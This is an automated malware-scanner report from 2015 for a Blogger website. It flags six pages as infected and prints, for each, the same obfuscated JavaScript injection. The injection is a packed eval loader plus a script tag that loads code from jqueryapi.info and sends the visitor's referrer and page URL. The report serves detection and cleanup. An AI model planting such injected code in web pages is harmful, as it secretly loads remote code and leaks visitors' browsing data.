Malware Scanner report for khatsii.com

Malicious/Suspicious/Total urls checked: 6/0/18

6 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://khatsii.com/	HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 07:11:09 GMT Location: http://www.khatsii.com/ Server: ghs Content-Length: 220 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.08 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block	clean
http://www.khatsii.com/	200 OK Content-Length: 116608 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='ï¿½'; var downPageWord ='ï¿½'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]\|\|e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, ... 119245 bytes are skipped ...5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%271%3D%220%222%3D%223/0%22%27%2C4%2C4%2C%27javascript%7Clanguage%7Ctype%7Ctext%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C/script%3E';var O01=document.createElement('script');O01.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var lIl=document.getElementsByTagName('head')[0];lIl.appendChild(O01);document.write(unescape(_escape)); Antivirus reports: Emsisoft Gen:Adware.MPlug.1 (B)
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js	200 OK Content-Length: 93868 Content-Type: text/javascript	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js	200 OK Content-Length: 94840 Content-Type: text/javascript	clean
https://apis.google.com/js/plusone.js	200 OK Content-Length: 12790 Content-Type: application/javascript	clean
http://connect.facebook.net/en_US/all.js	200 OK Content-Length: 161933 Content-Type: application/x-javascript	clean
http://platform.twitter.com/widgets.js	200 OK Content-Length: 115360 Content-Type: application/javascript	clean
http://khatsii.com/feeds/posts/default?alt=json-in-script&callback=av	HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 07:11:14 GMT Location: http://www.khatsii.com/feeds/posts/default?alt=json-in-script&callback=av Server: ghs Content-Length: 274 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.08 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block	clean
http://www.khatsii.com/feeds/posts/default?alt=json-in-script&callback=av	200 OK Content-Length: 10604 Content-Type: text/javascript	clean
http://yourjavascript.com/00911305131/pagenavigation.txt.js	200 OK Content-Length: 3497 Content-Type: text/javascript	clean
https://cdn.firebase.com/v0/firebase.js	200 OK Content-Length: 75290 Content-Type: application/javascript	clean
https://www.blogger.com/static/v1/widgets/3512243057-widgets.js	200 OK Content-Length: 90257 Content-Type: text/javascript	clean
http://khatsii.com//www.google.com/jsapi/	HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 07:11:15 GMT Location: http://www.khatsii.com//www.google.com/jsapi/ Server: ghs Content-Length: 242 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.08 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block	clean
http://www.khatsii.com//www.google.com/jsapi/	404 Not Found Content-Length: 93783 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='ï¿½'; var downPageWord ='ï¿½'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]\|\|e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, ... 119245 bytes are skipped ...5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%271%3D%220%222%3D%223/0%22%27%2C4%2C4%2C%27javascript%7Clanguage%7Ctype%7Ctext%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C/script%3E';var O01=document.createElement('script');O01.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var lIl=document.getElementsByTagName('head')[0];lIl.appendChild(O01);document.write(unescape(_escape)); Antivirus reports: Emsisoft Gen:Adware.MPlug.1 (B)
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=PageList&widgetId=PageList1&action=editWidget§ionId=site-header-w1/	404 Not Found Content-Length: 94304 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='ï¿½'; var downPageWord ='ï¿½'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]\|\|e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, ... 119245 bytes are skipped ...5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%271%3D%220%222%3D%223/0%22%27%2C4%2C4%2C%27javascript%7Clanguage%7Ctype%7Ctext%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C/script%3E';var O01=document.createElement('script');O01.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var lIl=document.getElementsByTagName('head')[0];lIl.appendChild(O01);document.write(unescape(_escape)); Antivirus reports: Emsisoft Gen:Adware.MPlug.1 (B)
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=Text&widgetId=Text1&action=editWidget§ionId=site-header-w1/	404 Not Found Content-Length: 94272 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='ï¿½'; var downPageWord ='ï¿½'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]\|\|e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, ... 119245 bytes are skipped ...5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%271%3D%220%222%3D%223/0%22%27%2C4%2C4%2C%27javascript%7Clanguage%7Ctype%7Ctext%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C/script%3E';var O01=document.createElement('script');O01.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var lIl=document.getElementsByTagName('head')[0];lIl.appendChild(O01);document.write(unescape(_escape)); Antivirus reports: Emsisoft Gen:Adware.MPlug.1 (B)
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=Attribution&widgetId=Attribution1&action=editWidget§ionId=site-header-w1/	404 Not Found Content-Length: 94328 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='ï¿½'; var downPageWord ='ï¿½'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]\|\|e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, ... 119245 bytes are skipped ...5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%271%3D%220%222%3D%223/0%22%27%2C4%2C4%2C%27javascript%7Clanguage%7Ctype%7Ctext%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C/script%3E';var O01=document.createElement('script');O01.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var lIl=document.getElementsByTagName('head')[0];lIl.appendChild(O01);document.write(unescape(_escape)); Antivirus reports: Emsisoft Gen:Adware.MPlug.1 (B)
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=FollowByEmail&widgetId=FollowByEmail1&action=editWidget§ionId=site-header-w1/	404 Not Found Content-Length: 94344 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='ï¿½'; var downPageWord ='ï¿½'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]\|\|e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, ... 119245 bytes are skipped ...5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%271%3D%220%222%3D%223/0%22%27%2C4%2C4%2C%27javascript%7Clanguage%7Ctype%7Ctext%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%3C/script%3E';var O01=document.createElement('script');O01.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var lIl=document.getElementsByTagName('head')[0];lIl.appendChild(O01);document.write(unescape(_escape)); Antivirus reports: Emsisoft Gen:Adware.MPlug.1 (B)

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: khatsii.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 28 Feb 2015 07:11:09 GMT
Location: http://www.khatsii.com/
Server: ghs
Content-Length: 220
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.08
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

...220 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: khatsii.com
Referer: http://www.google.com/search?q=khatsii.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=khatsii.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://khatsii.com/

Result: khatsii.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for khatsii.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools